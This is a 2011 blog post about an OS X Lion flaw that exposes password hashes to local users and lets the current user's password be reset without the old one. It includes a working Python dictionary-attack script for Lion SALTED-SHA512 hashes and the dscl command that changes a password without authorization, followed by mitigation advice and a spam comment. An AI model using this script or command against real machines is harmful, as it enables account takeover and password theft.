OS X Lion security flaw allows anyone to change your password

Posted: September 20, 2011 in Apple, Lion, Mac, Security

Security blog Defense in Depth has found a glaring security flaw in OS X Lion that lets any local user read the password hashes of every account on the machine, and lets anyone at a logged-in Mac change the current user's password outright. “[While] non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data,” Patrick Dunstan from Defense in Depth explained in a recent blog post. The hash data is handed out by the Directory Services command-line tool, dscl, which does not require root to query it; a simple Python script written by Dunstan pulls the hash out and runs a dictionary attack against it, so a weak password can be recovered offline. It gets worse. Reportedly, OS X Lion does not ask for the current user's existing password before setting a new one, so the password can be changed without ever cracking it.
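The following is an added example, not Dunstan's script and not code from the original post. It shows why exposing the hash data matters: it builds a ShadowHashData blob for a known password (constructed here, not captured from a real Mac), renders and re-parses it in the hex layout this example assumes dscl uses for binary attributes, and then runs a dictionary attack. The SALTED-SHA512 layout it assumes (a 4-byte salt followed by SHA-512 over salt || password, one iteration) is the Lion-era format; the dscl output formatting and the function names are assumptions of the example.

```python
"""Recover a Lion-era password from exposed ShadowHashData (added example).

Assumptions, stated here rather than taken from the post: the ShadowHashData
attribute is a binary plist whose "SALTED-SHA512" entry is a 4-byte salt
followed by SHA-512(salt || password); dscl prints a binary attribute as
space-separated groups of hex digits.  All sample data is constructed below.
"""
import binascii
import hashlib
import os
import plistlib
from typing import Iterable, Optional, Tuple

SALT_LEN = 4                                  # Lion prepends a 4-byte salt
DIGEST_LEN = hashlib.sha512().digest_size     # 64-byte SHA-512 output
HASH_KEY = "SALTED-SHA512"                    # plist key assumed for 10.7


def lion_salted_sha512(salt: bytes, password: str) -> bytes:
    """A single SHA-512 over salt || password; no iteration, so guesses are cheap."""
    return hashlib.sha512(salt + password.encode("utf-8")).digest()


def make_shadow_hash_data(password: str, salt: Optional[bytes] = None) -> bytes:
    """Construct a ShadowHashData blob for the demo (not captured from a Mac)."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be %d bytes" % SALT_LEN)
    return plistlib.dumps({HASH_KEY: salt + lion_salted_sha512(salt, password)},
                          fmt=plistlib.FMT_BINARY)


def format_as_dscl_output(blob: bytes) -> str:
    """Render the blob in the hex layout this example assumes for
    'dscl -read ... dsAttrTypeNative:ShadowHashData' (an assumption)."""
    hexstr = binascii.hexlify(blob).decode("ascii")
    groups = [hexstr[i:i + 8] for i in range(0, len(hexstr), 8)]
    return "dsAttrTypeNative:ShadowHashData:\n " + " ".join(groups) + "\n"


def parse_dscl_output(text: str) -> bytes:
    """Recover the raw blob from that hex output (inverse of format_as_dscl_output)."""
    _, _, body = text.partition("ShadowHashData:")
    return binascii.unhexlify("".join(body.split()))


def parse_shadow_hash_data(blob: bytes) -> Tuple[bytes, bytes]:
    """Split the SALTED-SHA512 entry into (salt, digest), validating its length."""
    entry = plistlib.loads(blob)[HASH_KEY]
    if len(entry) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected %s length %d" % (HASH_KEY, len(entry)))
    return entry[:SALT_LEN], entry[SALT_LEN:]


def check_password(blob: bytes, candidate: str) -> bool:
    """True if candidate is the password behind this blob."""
    salt, digest = parse_shadow_hash_data(blob)
    return lion_salted_sha512(salt, candidate) == digest


def crack(blob: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one SHA-512 per guess, which is why this format is weak."""
    salt, digest = parse_shadow_hash_data(blob)
    for guess in wordlist:
        if lion_salted_sha512(salt, guess) == digest:
            return guess
    return None


if __name__ == "__main__":
    # Constructed sample: an account whose password is "Lion2011!".
    captured = format_as_dscl_output(make_shadow_hash_data("Lion2011!"))
    blob = parse_dscl_output(captured)
    print("salt:", parse_shadow_hash_data(blob)[0].hex())
    print("recovered:", crack(blob, ["password", "letmein", "Lion2011!"]))
```

On a real Lion box the input to parse_dscl_output would be the output of dscl for the target user; here it is generated locally so the script runs anywhere. The point a practitioner should take from it is the cost per guess: a single unsalted-iteration SHA-512 means a commodity machine tries hundreds of millions of candidates per second against a leaked hash.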

That means typing the command:

dscl localhost -passwd /Search/Users/CoreBuilder

will prompt you to set a new password for the user CoreBuilder (the account name used in the example) without asking for the old one. As CNET points out, an attacker can only exploit the bug with local access to the computer, in practice an unattended, unlocked session, and with access to Directory Services; it is not remotely exploitable on its own.

CNET suggests disabling automatic log-in, requiring a password to wake from sleep or the screen saver, and disabling the guest account as preventative measures to keep your Mac secure; each of these denies an attacker the logged-in session the attack depends on.

[Via CNET]

Comments
  1. 中和租屋 says:

    Wow! This can be one of the top blogs I've actually come across on this subject. Merely magnificent.
